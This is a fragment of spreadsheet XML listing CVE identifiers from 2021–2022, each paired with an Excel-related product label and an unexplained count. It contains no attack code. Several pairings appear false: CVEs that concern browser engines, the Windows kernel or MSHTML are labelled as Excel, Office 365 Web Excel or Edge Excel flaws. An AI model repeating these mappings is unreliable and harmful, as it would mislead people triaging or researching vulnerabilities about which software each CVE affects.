    <row r="33">
      <c r="A33" t="inlineStr">
        <is>
          <t>CVE-2021-21166</t>
        </is>
      </c>
      <c r="B33" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C33" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" t="inlineStr">
        <is>
          <t>CVE-2021-28449</t>
        </is>
      </c>
      <c r="B34" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C34" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" t="inlineStr">
        <is>
          <t>CVE-2021-30506</t>
        </is>
      </c>
      <c r="B35" t="inlineStr">
        <is>
          <t>Google Sheets Excel Import</t>
        </is>
      </c>
      <c r="C35" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" t="inlineStr">
        <is>
          <t>CVE-2021-30563</t>
        </is>
      </c>
      <c r="B36" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C36" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" t="inlineStr">
        <is>
          <t>CVE-2021-30661</t>
        </is>
      </c>
      <c r="B37" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C37" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" t="inlineStr">
        <is>
          <t>CVE-2021-31174</t>
        </is>
      </c>
      <c r="B38" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C38" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" t="inlineStr">
        <is>
          <t>CVE-2021-31199</t>
        </is>
      </c>
      <c r="B39" t="inlineStr">
        <is>
          <t>Office 365 Web Excel</t>
        </is>
      </c>
      <c r="C39" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" t="inlineStr">
        <is>
          <t>CVE-2021-31201</t>
        </is>
      </c>
      <c r="B40" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C40" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" t="inlineStr">
        <is>
          <t>CVE-2021-31939</t>
        </is>
      </c>
      <c r="B41" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C41" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" t="inlineStr">
        <is>
          <t>CVE-2021-31955</t>
        </is>
      </c>
      <c r="B42" t="inlineStr">
        <is>
          <t>Edge Excel Processing</t>
        </is>
      </c>
      <c r="C42" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" t="inlineStr">
        <is>
          <t>CVE-2021-40444</t>
        </is>
      </c>
      <c r="B43" t="inlineStr">
        <is>
          <t>Excel Macro Execution</t>
        </is>
      </c>
      <c r="C43" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" t="inlineStr">
        <is>
          <t>CVE-2021-42292</t>
        </is>
      </c>
      <c r="B44" t="inlineStr">
        <is>
          <t>Excel Macro Execution</t>
        </is>
      </c>
      <c r="C44" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" t="inlineStr">
        <is>
          <t>CVE-2021-42321</t>
        </is>
      </c>
      <c r="B45" t="inlineStr">
        <is>
          <t>Office 365 Web Excel</t>
        </is>
      </c>
      <c r="C45" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" t="inlineStr">
        <is>
          <t>CVE-2022-0609</t>
        </is>
      </c>
      <c r="B46" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C46" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" t="inlineStr">
        <is>
          <t>CVE-2022-21989</t>
        </is>
      </c>
      <c r="B47" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C47" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" t="inlineStr">
        <is>
          <t>CVE-2022-21999</t>
        </is>
      </c>
      <c r="B48" t="inlineStr">
        <is>
          <t>Multi-platform Excel</t>
        </is>
      </c>
      <c r="C48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2025-07-27T15:29:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-27T15:29:02Z</dcterms:modified>
</cp:coreProperties>
</file>